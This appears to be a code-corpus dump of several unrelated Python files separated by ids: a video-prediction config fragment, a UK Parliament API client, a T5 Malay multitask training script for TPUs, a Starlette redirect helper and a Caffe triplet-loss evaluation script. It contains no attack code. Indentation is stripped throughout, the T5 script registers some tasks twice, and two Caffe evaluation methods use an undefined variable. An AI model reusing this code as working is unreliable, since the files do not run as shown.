'pred_model': VPred_Model_Interface,
'pred_model_class': SAVPVideoPredictionModel,
'setup_predictor':setup_predictor,
'json_dir': modeldir + '/model.savp.None',
'pretrained_model':modeldir + '/model.savp.None/model-190000', # 'filepath of a pretrained model to resume training from.' ,
'sequence_length': 13, # 'sequence length to load, including context frames.' ,
'context_frames': 2, # of frames before predictions.' ,
'model': 'appflow', #'model architecture to use - CDNA, DNA, or STP' ,
'batch_size': 200,
'sdim':5,
'adim':4,
'orig_size':[48,64],
'ndesig':1,
'ncam':1,
}
|
11521126
|
import urllib.parse
import requests
import datetime
import xml.etree.ElementTree as ET
from .resource import Bill, EDM, Division, Member, parse_data, MemberList
from .parties import Parties
class Parliament(object):
LDA_ENDPOINT = "http://lda.data.parliament.uk/"
MEMBERS_NAMES_ENDPOINT = (
"http://data.parliament.uk/membersdataplatform/services/mnis/members/query/"
)
def __init__(self):
self.http = requests.Session()
self.commons = Commons(self)
self.lords = House("Lords", self)
self.parties = Parties(self)
def get_bills(self, limit: int = 50, page: int = 0):
res = self.get("bills.json", limit, page)
for item in res["items"]:
b = Bill(self)
b.resource = item["_about"]
b.title = item["title"]
b.home_page = item["homePage"]
b.type = item["billType"]
b.date = parse_data(item["date"]).date()
yield b
def get(self, path: str, limit: int = None, page: int = None, additional_params={}):
""" Make a request to the Linked Data API. Returns a python data structure. """
params = {}
if limit is not None:
params["_pageSize"] = limit
if page is not None:
params["_page"] = page
params.update(additional_params)
url = self.LDA_ENDPOINT + path
if len(params) > 0:
url = url + "?" + urllib.parse.urlencode(params)
res = self.http.get(url)
res.raise_for_status()
data = res.json()
return data["result"]
def get_members(self, **kwargs):
""" Make a request to the Members Names API with the kwargs as parameters.
Parameter documentation: http://data.parliament.uk/membersdataplatform/memberquery.aspx
Returns an etree object of the XML
"""
url = self.MEMBERS_NAMES_ENDPOINT
url += "|".join(k + "=" + str(v) for k, v in kwargs.items())
res = self.http.get(url)
return ET.fromstring(res.text)
class Members(object):
def __init__(self, house):
self.parl = house.parl
self.house = house
self._members = {}
def from_id(self, member_id: int) -> Member:
if member_id not in self._members:
self._members[member_id] = Member(self.parl, self.house, member_id)
return self._members[member_id]
def from_url(self, url: str) -> Member:
""" Return a member from a data URL, e.g.:
Commons: http://data.parliament.uk/members/4637
Lords: http://data.parliament.uk/resources/members/api/lords/id/631
(why are they different?)
"""
return self.from_id(int(url.split("/")[-1]))
def from_vote(self, data: dict) -> Member:
""" Return a member from a short summary of that member, importing name and party
from the summary to reduce additional requests.
"""
if type(data["member"][0]) == dict:
# Commons
member = self.from_url(data["member"][0]["_about"])
else:
# Lords
member = self.from_url(data["member"][0])
if "memberPrinted" in data:
# Commons
member.display_name = data["memberPrinted"]["_value"]
else:
# Lords
member.display_name = data["memberRank"] + " " + data["memberTitle"]
member.party = self.parl.parties.from_name(data["memberParty"])
return member
def current(self) -> MemberList:
""" Fetch all current members of the house. """
data = self.parl.get_members(house=self.house.name)
members = MemberList()
for mem in data.iter("Member"):
obj = self.from_id(int(mem.get("Member_Id")))
obj._populate_data(mem)
members.append(obj)
return members
class House(object):
def __init__(self, name: str, parl):
self.name = name
self.parl = parl
self.members = Members(self)
def recent_divisions(
self, limit: int = 50, page: int = 0, since: str = None, cachebust: bool = False
):
""" Return the recent divisions for this house.
The "cachebust" parameter will defeat the rather overzealous
caching on this endpoint, so use it considerately.
"""
params = {}
if since:
params["min-uin"] = since
if cachebust:
params["max-date"] = (
datetime.datetime.utcnow() + datetime.timedelta(hours=24)
).isoformat()
res = self.parl.get("%sdivisions.json" % self.name.lower(), limit, page, params)
divisions = []
for item in res["items"]:
if since is not None and item["uin"] <= since:
continue
div = Division(self)
div.title = item["title"].strip()
div.uin = item["uin"]
div.resource = item["_about"]
div.date = parse_data(item["date"]).date()
divisions.append(div)
# Divisions are not correctly sorted within days, so re-sort them
return sorted(divisions)
class Commons(House):
def __init__(self, parl):
super().__init__("Commons", parl)
def get_edms(self, limit=50, page=0):
res = self.parl.get("edms.json", limit, page)
for item in res["items"]:
edm = EDM()
edm.title = item["title"]
edm.session = item["session"]
edm.number = int(parse_data(item["edmNumber"]))
edm.date_tabled = parse_data(item["dateTabled"]).date()
edm.status = parse_data(item["edmStatus"])
if "sponsorPrinted" in item:
edm.sponsors = item["sponsorPrinted"]
edm.primary_sponsor = item["primarySponsorPrinted"]
edm.signatures = item["numberOfSignatures"]
yield edm
|
11521149
|
import tensorflow as tf
import tensorflow_datasets as tfds
from t5.data import preprocessors as prep
import functools
import t5
import gin
vocab = 'gs://mesolitica-tpu-general/t5-data-v2/sp10m.cased.ms-en.model'
tpu = tf.distribute.cluster_resolver.TPUClusterResolver(
'node-7', zone='europe-west4-a', project='mesolitica-tpu'
)
TPU_ADDRESS = tpu.get_master()
TPU_TOPOLOGY = '2x2'
print(TPU_ADDRESS)
def dumping_dataset(split, shuffle_files=False):
del shuffle_files
files = [
'gs://mesolitica-tpu-general/t5-data-v2/dumping-news.txt.tsv',
'gs://mesolitica-tpu-general/t5-data-v2/dumping-parliament.txt.tsv',
'gs://mesolitica-tpu-general/t5-data-v2/filtered-dumping-academia.txt.tsv',
'gs://mesolitica-tpu-general/t5-data-v2/filtered-dumping-wiki.txt.tsv'
]
files.extend(tf.io.gfile.glob('gs://mesolitica-tpu-general/t5-data-v2/00.jsonl-*.translated.txt.tsv'))
ds = tf.data.TextLineDataset(files)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['title', 'text'], ex)))
return ds
t5.data.TaskRegistry.remove('dumping_dataset')
t5.data.TaskRegistry.add(
'dumping_dataset',
dataset_fn=dumping_dataset,
splits=['train'],
text_preprocessor=functools.partial(
t5.data.preprocessors.rekey,
key_map={'inputs': None, 'targets': 'text'},
),
token_preprocessor=t5.data.preprocessors.unsupervised,
sentencepiece_model_path=vocab,
metric_fns=[],
)
def question_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/qa.tsv',
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def question_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': tf.strings.join(['soalan: ', ex['question']]),
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('question_dataset')
t5.data.TaskRegistry.add(
'question_dataset',
dataset_fn=question_dataset,
splits=['train'],
text_preprocessor=[question_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
def pair_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(tf.io.gfile.glob('gs://mesolitica-tpu-general/t5-data-v2/*pair.tsv'))
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['text'], ex)))
return ds
t5.data.TaskRegistry.remove('pair_dataset')
t5.data.TaskRegistry.add(
'pair_dataset',
dataset_fn=pair_dataset,
splits=['train'],
text_preprocessor=[prep.next_sentence_prediction],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
def news_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/newstitle.tsv'
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def news_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': tf.strings.join(['tajuk: ', ex['question']]),
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('news_dataset')
t5.data.TaskRegistry.add(
'news_dataset',
dataset_fn=news_dataset,
splits=['train'],
text_preprocessor=[news_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
def summarization_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/summarization.tsv'
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def summarization_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': tf.strings.join(['ringkasan: ', ex['question']]),
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('summarization_dataset')
t5.data.TaskRegistry.add(
'summarization_dataset',
dataset_fn=summarization_dataset,
splits=['train'],
text_preprocessor=[summarization_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
def similarity_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/snli.tsv',
'gs://mesolitica-tpu-general/t5-data-v2/mnli.tsv'
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def similarity_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': ex['question'],
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('similarity_dataset')
t5.data.TaskRegistry.add(
'similarity_dataset',
dataset_fn=similarity_dataset,
splits=['train'],
text_preprocessor=[similarity_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
def en_ms_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/en-ms.tsv'
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def en_ms_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': tf.strings.join(['terjemah Inggeris ke Melayu: ', ex['question']]),
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('en_ms_dataset')
t5.data.TaskRegistry.add(
'en_ms_dataset',
dataset_fn=en_ms_dataset,
splits=['train'],
text_preprocessor=[en_ms_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
def ms_en_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/ms-en.tsv'
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def ms_en_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': tf.strings.join(['terjemah Melayu ke Inggeris: ', ex['question']]),
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('ms_en_dataset')
t5.data.TaskRegistry.add(
'ms_en_dataset',
dataset_fn=ms_en_dataset,
splits=['train'],
text_preprocessor=[ms_en_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
def knowledge_graph_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/knowledge-graph.tsv'
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def knowledge_graph_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': tf.strings.join(['grafik pengetahuan: ', ex['question']]),
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('knowledge_graph_dataset')
t5.data.TaskRegistry.add(
'knowledge_graph_dataset',
dataset_fn=knowledge_graph_dataset,
splits=['train'],
text_preprocessor=[knowledge_graph_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
def paraphrase_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/paraphrase.tsv'
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def paraphrase_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': tf.strings.join(['parafrasa: ', ex['question']]),
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('paraphrase_dataset')
t5.data.TaskRegistry.add(
'paraphrase_dataset',
dataset_fn=paraphrase_dataset,
splits=['train'],
text_preprocessor=[paraphrase_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
t5.data.MixtureRegistry.remove('trivia_all_bahasa')
t5.data.MixtureRegistry.add(
'trivia_all_bahasa',
[
'dumping_dataset',
'question_dataset',
'pair_dataset',
'news_dataset',
'summarization_dataset',
'similarity_dataset',
'en_ms_dataset',
'ms_en_dataset',
'knowledge_graph_dataset',
'paraphrase_dataset'
],
default_rate=1.0,
)
def ms_en_dataset(split, shuffle_files=False):
del shuffle_files
ds = tf.data.TextLineDataset(
[
'gs://mesolitica-tpu-general/t5-data-v2/ms-en.tsv'
]
)
ds = ds.map(
functools.partial(
tf.io.decode_csv,
record_defaults=['', ''],
field_delim='\t',
use_quote_delim=False,
),
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
ds = ds.map(lambda *ex: dict(zip(['question', 'answer'], ex)))
return ds
def ms_en_preprocessor(ds):
def to_inputs_and_targets(ex):
return {
'inputs': tf.strings.join(['terjemah Melayu ke Inggeris: ', ex['question']]),
'targets': ex['answer'],
}
return ds.map(
to_inputs_and_targets,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
t5.data.TaskRegistry.remove('ms_en_dataset')
t5.data.TaskRegistry.add(
'ms_en_dataset',
dataset_fn=ms_en_dataset,
splits=['train'],
text_preprocessor=[ms_en_preprocessor],
sentencepiece_model_path=vocab,
postprocess_fn=t5.data.postprocessors.lower_text,
metric_fns=[t5.evaluation.metrics.accuracy],
)
t5.data.MixtureRegistry.remove('trivia_all_bahasa')
t5.data.MixtureRegistry.add(
'trivia_all_bahasa',
[
'dumping_dataset',
'question_dataset',
'pair_dataset',
'news_dataset',
'summarization_dataset',
'similarity_dataset',
'en_ms_dataset',
'ms_en_dataset',
],
default_rate=1.0,
)
def main(_):
tf.logging.set_verbosity(tf.logging.DEBUG)
gin.parse_config_file(
'gs://mesolitica-tpu-general/t5-data/pretrained_models_middle_operative_config.gin'
)
MODEL_SIZE = 'base'
model_parallelism, train_batch_size, keep_checkpoint_max = {
'small': (1, 256, 16),
'base': (2, 128, 8),
'large': (8, 64, 4),
'3B': (8, 16, 1),
'11B': (8, 16, 1),
}[MODEL_SIZE]
model = t5.models.MtfModel(
model_dir='gs://mesolitica-tpu-general/t5-middle-v2/',
tpu=TPU_ADDRESS,
tpu_topology=TPU_TOPOLOGY,
model_parallelism=model_parallelism,
batch_size=train_batch_size,
sequence_length={'inputs': 1024, 'targets': 1024},
learning_rate_schedule=0.001,
save_checkpoints_steps=5000,
keep_checkpoint_max=5,
iterations_per_loop=100,
)
model.train(mixture_or_task_name='trivia_all_bahasa', steps=1000000)
if __name__ == '__main__':
tf.app.run()
|
11521208
|
from starlette.requests import Request
from starlette.responses import RedirectResponse
from starlette.status import HTTP_303_SEE_OTHER
def redirect(request: Request, view: str, **params):
return RedirectResponse(
url=request.app.admin_path + request.app.url_path_for(view, **params),
status_code=HTTP_303_SEE_OTHER,
)
|
11521224
|
import numpy as np
import os
import cv2
import cv2.cv as cv
from skimage import transform as tf
from PIL import Image, ImageDraw
import threading
from time import ctime,sleep
import time
import sklearn
import matplotlib.pyplot as plt
import skimage
import sklearn.metrics.pairwise as pw
import triplet._init_paths
import triplet.config as cfg
from triplet.sampledata import sampledata
from utils.timer import Timer
import caffe
from caffe.proto import caffe_pb2
import google.protobuf as pb2
import argparse
import glob
from sklearn.metrics import confusion_matrix
import pandas as pd
####
####Define Recognizer
####
global filelist_path
filelist_path='./filelist/'
global extension
extension='.txt'
global filenames
filenames = ['c0','c1','c2','c3','c4','c5','c6','c7','c8','c9']
global filecount
filecount = [2489,2267,2317,2346,2326,2312,2325,2002,1911,2129]
global feature_size
feature_size=1024
global class_size
class_size=10
global model_name
model_name = 'triplet-loss'#'batch-triplet-loss'#'softmax'#
global accuracy_path
accuracy_path = './accuracy/'
def plot_confusion_matrix(df_confusion, title='Confusion matrix', cmap=plt.cm.gray_r):
plt.matshow(df_confusion, cmap=cmap) # imshow
#plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(df_confusion.columns))
plt.xticks(tick_marks, df_confusion.columns, rotation=45)
plt.yticks(tick_marks, df_confusion.index)
#plt.tight_layout()
plt.ylabel(df_confusion.index.name)
plt.xlabel(df_confusion.columns.name)
class Recognizer(caffe.Net):
"""
Recognizer extends Net for image class prediction
by scaling, center cropping, or oversampling.
Parameters
----------
image_dims : dimensions to scale input for cropping/sampling.
Default is to scale to net input size for whole-image crop.
mean, input_scale, raw_scale, channel_swap: params for
preprocessing options.
"""
def __init__(self, model_file, pretrained_file, mean_file=None,
image_dims=(227, 227),
raw_scale=255,
channel_swap=(2,1,0),
input_scale=None):
#set GPU mode
caffe.set_mode_gpu()
#init net
caffe.Net.__init__(self, model_file, pretrained_file, caffe.TEST)
# configure pre-processing
in_ = self.inputs[0]
self.transformer = caffe.io.Transformer(
{in_: self.blobs[in_].data.shape})
self.transformer.set_transpose(in_, (2, 0, 1))
if mean_file is not None:
proto_data = open(mean_file, "rb").read()
mean_blob = caffe.io.caffe_pb2.BlobProto.FromString(proto_data)
mean = caffe.io.blobproto_to_array(mean_blob)[0]
self.transformer.set_mean(in_, mean)
if input_scale is not None:
self.transformer.set_input_scale(in_, input_scale)
if raw_scale is not None:
self.transformer.set_raw_scale(in_, raw_scale)
if channel_swap is not None:
self.transformer.set_channel_swap(in_, channel_swap)
self.crop_dims = np.array(self.blobs[in_].data.shape[2:])
if not image_dims:
image_dims = self.crop_dims
self.image_dims = image_dims
def alex_predict(self, oversample=True):
"""
Predict classification probabilities of inputs.
Parameters
----------
inputs : iterable of (H x W x K) input ndarrays.
oversample : boolean
average predictions across center, corners, and mirrors
when True (default). Center-only prediction when False.
Returns
-------
predictions: (N x C) ndarray of class probabilities for N images and C
classes.
"""
#load files
input_dir='/media/frank/Data/Database/ImageNet/Kaggle/train/c9'
inputs =[caffe.io.load_image(im_f)
for im_f in glob.glob(input_dir + '/*.jpg')]
# Scale to standardize input dimensions.
input_ = np.zeros((len(inputs),
self.image_dims[0],
self.image_dims[1],
inputs[0].shape[2]),
dtype=np.float32)
for ix, in_ in enumerate(inputs):
input_[ix] = caffe.io.resize_image(in_, self.image_dims)
if oversample:
# Generate center, corner, and mirrored crops.
input_ = caffe.io.oversample(input_, self.crop_dims)
else:
# Take center crop.
center = np.array(self.image_dims) / 2.0
crop = np.tile(center, (1, 2))[0] + np.concatenate([
-self.crop_dims / 2.0,
self.crop_dims / 2.0
])
crop = crop.astype(int)
input_ = input_[:, crop[0]:crop[2], crop[1]:crop[3], :]
# Classify
caffe_in = np.zeros(np.array(input_.shape)[[0, 3, 1, 2]],
dtype=np.float32)
for ix, in_ in enumerate(input_):
caffe_in[ix] = self.transformer.preprocess(self.inputs[0], in_)
out = self.forward_all(**{self.inputs[0]: caffe_in})
predictions = out[self.outputs[0]]
# For oversampling, average predictions across crops.
if oversample:
predictions = predictions.reshape((len(predictions) / 10, 10, -1))
predictions = predictions.mean(1)
return predictions
def read_imagelist(self,filelist):
fid=open(filelist)
lines=fid.readlines()
test_num=len(lines)
fid.close()
X=np.empty((test_num,3,self.image_dims[0],self.image_dims[1]))
i =0
for line in lines:
word=line.split('\n')
filename=word[0]
im1=skimage.io.imread(filename,as_grey=False)
image =skimage.transform.resize(im1,(self.image_dims[0], self.image_dims[1]))*255
if image.ndim<3:
print 'gray:'+filename
X[i,0,:,:]=image[:,:]
X[i,1,:,:]=image[:,:]
X[i,2,:,:]=image[:,:]
else:
X[i,0,:,:]=image[:,:,2]
X[i,1,:,:]=image[:,:,0]
X[i,2,:,:]=image[:,:,1]
i=i+1
return X
def read_labels(labelfile):
fin=open(labelfile)
lines=fin.readlines()
labels=np.empty((len(lines),))
k=0;
for line in lines:
labels[k]=int(line)
k=k+1;
fin.close()
return labels
def draw_roc_curve(fpr,tpr,title='cosine',save_name='roc_lfw'):
plt.figure()
plt.plot(fpr, tpr)
plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.0])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic using: '+title)
plt.legend(loc="lower right")
plt.show()
plt.savefig(save_name+'.png')
#predict_test_alexnet
def test_alex(self):
class_index = 0
image_index = 0
total_count = 0.0
accept_sum = 0
actual = []
predict = []
for filename in filenames:
#query-feature
X=self.read_imagelist(filelist_path + filename + extension)
test_num=np.shape(X)[0]
out = self.forward_all(data=X)
predicts=out[self.outputs[0]]
predicts=np.reshape(predicts,(test_num,10))
confusion_array = np.zeros((class_size), dtype = np.int)
for i in range(test_num):
actual.append(class_index)
for j in range(class_size):
if np.max(predicts[i]) == predicts[i][j]:
confusion_array[j] += 1
predict.append(j)
image_index += 1
#print(confusion_array)
total_count += test_num
accept_sum += confusion_array[class_index]
class_index += 1
print 'total:%d' % (round(total_count))
print 'accept:%d' % (accept_sum)
print 'reject:%d' % (round(total_count) - accept_sum)
print 'accuray:%.4f' % (accept_sum / total_count)
#conf_mat = confusion_matrix(actual,predict)
#print(conf_mat)
#actual = np.array(actual)
#predict = np.array(predict)
#y_actual = pd.Series(actual, name='Actual')
#y_predict = pd.Series(predict, name='Predicted')
#df_confusion = pd.crosstab(y_actual,y_predict, rownames=['Actual'], colnames=['Predicted'], margins=True)
#print(df_confusion)
#plot_confusion_matrix(df_confusion)
return (accept_sum / total_count)
#process a text file
def evaluate(self,metric='cosine'):
#sample-feature
X=self.read_imagelist(filelist_sample)
sample_num=np.shape(X)[0]
out = self.forward_all(data=X)
feature1=np.float64(out['deepid'])
feature1=np.reshape(feature1,(sample_num,feature_size))
#np.savetxt('feature1.txt', feature1, delimiter=',')
class_index = 0
image_index = 0
total_count = 0.0
accept_sum = 0
actual = []
predict = []
for filename in filenames:
#query-feature
X=self.read_imagelist(filelist_path + filename + extension)
test_num=np.shape(X)[0]
out = self.forward_all(data=X)
feature2=np.float64(out['deepid'])
feature2=np.reshape(feature2,(test_num,feature_size))
#np.savetxt('feature2.txt', feature2, delimiter=',')
#mt=pw.pairwise_distances(feature2, feature1, metric=metric)
mt=pw.cosine_similarity(feature2, feature1)
false=0
for i in range(test_num):
actual.append(class_index)
for j in range(sample_num):
if np.max(mt[i]) == mt[i][j]:
confusion_array[j] += 1
predict.append(j)
image_index += 1
total_count += test_num
accept_sum += confusion_array[class_index]
class_index += 1
print 'total:%d' % (round(total_count))
print 'accept:%d' % (accept_sum)
print 'reject:%d' % (round(total_count) - accept_sum)
print 'accuray:%.4f' % (accept_sum / total_count)
#conf_mat = confusion_matrix(actual,predict)
#print(conf_mat)
actual = np.array(actual)
predict = np.array(predict)
y_actual = pd.Series(actual, name='Actual')
y_predict = pd.Series(predict, name='Predicted')
df_confusion = pd.crosstab(y_actual,y_predict, rownames=['Actual'], colnames=['Predicted'], margins=True)
print(df_confusion)
plot_confusion_matrix(df_confusion)
return (accept_sum / total_count)
#process a text file
def evaluate2(self,metric='cosine'):
feature1=np.fromfile('./features/' + model_name +'-features.dat',dtype=np.float64)
feature1=np.reshape(feature1,(class_size,feature_size))
#np.savetxt('feature1.txt', feature1, delimiter=',')
class_index = 0
image_index = 0
total_count = 0.0
accept_sum = 0
actual = []
predict = []
for filename in filenames:
#query-feature
X=self.read_imagelist(filelist_path + filename + extension)
test_num=np.shape(X)[0]
out = self.forward_all(data=X)
feature2=np.float64(out['deepid'])
feature2=np.reshape(feature2,(test_num,feature_size))
#np.savetxt('feature2.txt', feature2, delimiter=',')
#mt=pw.pairwise_distances(feature2, feature1, metric=metric)
mt=pw.cosine_similarity(feature2, feature1)
false=0
for i in range(test_num):
actual.append(class_index)
for j in range(class_size):
if np.max(mt[i]) == mt[i][j]:
confusion_array[j] += 1
predict.append(j)
image_index += 1
total_count += test_num
accept_sum += confusion_array[class_index]
class_index += 1
print 'total:%d' % (round(total_count))
print 'accept:%d' % (accept_sum)
print 'reject:%d' % (round(total_count) - accept_sum)
print 'accuray:%.4f' % (accept_sum / total_count)
#conf_mat = confusion_matrix(actual,predict)
#print(conf_mat)
#actual = np.array(actual)
#predict = np.array(predict)
#y_actual = pd.Series(actual, name='Actual')
#y_predict = pd.Series(predict, name='Predicted')
#df_confusion = pd.crosstab(y_actual,y_predict, rownames=['Actual'], colnames=['Predicted'], margins=True)
#print(df_confusion)
#plot_confusion_matrix(df_confusion)
return (accept_sum / total_count)
#process a text file
def evaluate3(self,metric='cosine'):
feature1=np.fromfile('./features/' + model_name +'-features.dat',dtype=np.float64)
feature1=np.reshape(feature1,(class_size,feature_size))
class_index = 0
image_index = 0
total_count = 0.0
accept_sum = 0
top5_accept_sum = 0
actual = []
predict = []
for filename in filenames:
#query-feature
#X=self.read_imagelist(filelist_path + filename + extension)
test_num = filecount[class_index]#np.shape(X)[0]
feature2=np.fromfile('./features/' + model_name +'-features-c' + str(class_index) + '.dat',dtype=np.float64)
feature2=np.reshape(feature2,(test_num,feature_size))
mt=pw.cosine_similarity(feature2, feature1)
top5_accept = 0
confusion_array = np.zeros((class_size), dtype = np.int)
for i in range(test_num):
actual.append(class_index)
sort_array = np.zeros((class_size), dtype = np.float64)
for j in range(class_size):
sort_array[j] = mt[i][j]
if np.max(mt[i]) == mt[i][j]:
confusion_array[j] += 1
predict.append(j)
break
#print(sort_array)
sort_array.sort()
#print(sort_array)
for j in range((class_size - 5),class_size):
if sort_array[j] == mt[i][class_index]:
top5_accept += 1
break
image_index += 1
total_count += test_num
accept_sum += confusion_array[class_index]
top5_accept_sum += top5_accept
class_index += 1
print 'total:%d' % (round(total_count))
print 'accept:%d' % (accept_sum)
print 'reject:%d' % (round(total_count) - accept_sum)
print 'top 1 accuray:%.4f' % (accept_sum / total_count)
print 'top 5 accuray:%.4f' % (top5_accept_sum / total_count)
#conf_mat = confusion_matrix(actual,predict)
#print(conf_mat)
actual = np.array(actual)
predict = np.array(predict)
y_actual = pd.Series(actual, name='Actual')
y_predict = pd.Series(predict, name='Predicted')
df_confusion = pd.crosstab(y_actual,y_predict, rownames=['Actual'], colnames=['Predicted'], margins=True)
print(df_confusion)
#plot_confusion_matrix(df_confusion)
result = []
result.append(accept_sum / total_count)
result.append(top5_accept_sum / total_count)
return result
#save features
def saveFeature(self):
averages=np.zeros((class_size,feature_size),dtype=np.float64)
i=0
for filename in filenames:
#query-feature
X=self.read_imagelist(filelist_path + filename + extension)
test_num=np.shape(X)[0]
out = self.forward_all(data=X)
feature2=np.float64(out['deepid'])
feature2.tofile('./features/' + model_name + '-features-c' + str(i) + '.dat')
feature2=np.reshape(feature2,(test_num,feature_size))
average=np.zeros((feature_size),dtype=np.float64)
for j in range(test_num):
average[:] = average[:] + feature2[j,:]
average[:]=average[:]/test_num
averages[i,:]=average[:]
i=i+1
averages.tofile('./features/' + model_name + '-features.dat')
#process an image file
def getFeature2(self,imgfile):
img=skimage.io.imread(imgfile,as_grey=False)
